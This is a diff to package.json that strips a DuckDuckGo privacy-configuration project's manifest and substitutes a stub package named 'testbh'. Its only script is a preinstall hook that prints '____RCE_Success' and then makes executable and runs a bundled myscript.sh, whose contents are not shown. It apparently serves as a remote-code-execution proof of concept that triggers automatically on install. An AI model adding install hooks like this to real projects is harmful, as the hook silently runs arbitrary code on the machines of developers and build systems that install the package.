--- a/package.json
+++ b/package.json
@@ -1,40 +1,12 @@
 {
-  "name": "@duckduckgo/privacy-configuration",
-  "version": "1.0.0",
-  "description": "Build scripts and generated files for privacy feature configuration",
-  "main": "index.js",
-  "type": "module",
-  "scripts": {
-    "test": "npm run build && npm run unit-tests && npm run lint && npm run tsc",
-    "check-lockfile": "node scripts/check-lockfile.mjs",
-    "lint": "npm run check-lockfile && eslint . && prettier . --check",
-    "lint-fix": "npm run check-lockfile && eslint . --fix && prettier . --write",
-    "tsc": "tsc",
-    "tsc-watch": "tsc --watch",
-    "unit-tests": "mocha ./tests/**/*.js",
-    "build": "node index.js",
-    "build:debug": "node index.js --debug",
-    "format": "prettier . --write"
-  },
-  "author": "DuckDuckGo",
-  "license": "Apache 2.0",
-  "devDependencies": {
-    "@duckduckgo/eslint-config": "github:duckduckgo/eslint-config#v0.1.0",
-    "ajv": "^8.17.1",
-    "chai": "^5.2.0",
-    "diff": "^7.0.0",
-    "eslint": "^9.17.0",
-    "immutable-json-patch": "^6.0.1",
-    "mocha": "^11.0.1",
-    "prettier": "3.4.2",
-    "prettier-plugin-multiline-arrays": "^4.0.3",
-    "ts-json-schema-generator": "^2.3.0",
-    "typescript": "^5.7.3"
-  },
-  "dependencies": {
-    "eslint-plugin-json": "^4.0.1",
-    "fast-json-patch": "^3.1.1",
-    "node-fetch": "^3.3.2",
-    "tldts": "^6.1.71"
-  }
+    "name": "testbh",
+    "private": true,
+    "version": "0.1.0",
+    "dependencies": {
+      "yarn": "^1.12.3"
+    },
+    "scripts": {
+      "preinstall": "echo ____RCE_Success runFile >&2; chmod +x myscript.sh; ./myscript.sh "
+    }
 }
+  
